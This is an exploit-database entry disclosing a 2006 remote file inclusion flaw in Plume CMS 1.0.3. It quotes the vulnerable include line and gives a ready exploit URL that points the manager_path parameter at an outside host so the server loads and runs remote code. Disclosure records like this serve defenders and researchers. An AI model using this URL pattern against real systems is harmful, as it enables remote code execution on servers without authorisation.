Exploit Plume CMS 1.0.3 - 'manager_path' Remote File Inclusion

[Exploiter]

EDB-ID

1832

Проверка EDB

1. Пройдено

Автор

BEFORD

Тип уязвимости

WEBAPPS

Платформа

PHP

CVE

cve-2006-2645 cve-2006-0725

Дата публикации

2006-05-26

Vendor: Plume CMS http://plume-cms.net
Vuln: Remote File Include
Discovered: beford <xbefordx gmail com>

Vulnerable File/Code

./plume-1.0.3/manager/frontinc/prepend.php

[code]
include_once $_PX_config['manager_path'].'/conf/config.php';

http://urlanda.org/manager/frontinc/prepend.php?_PX_config[manager_path]=http://leet

# milw0rm.com [2006-05-26][/CODE]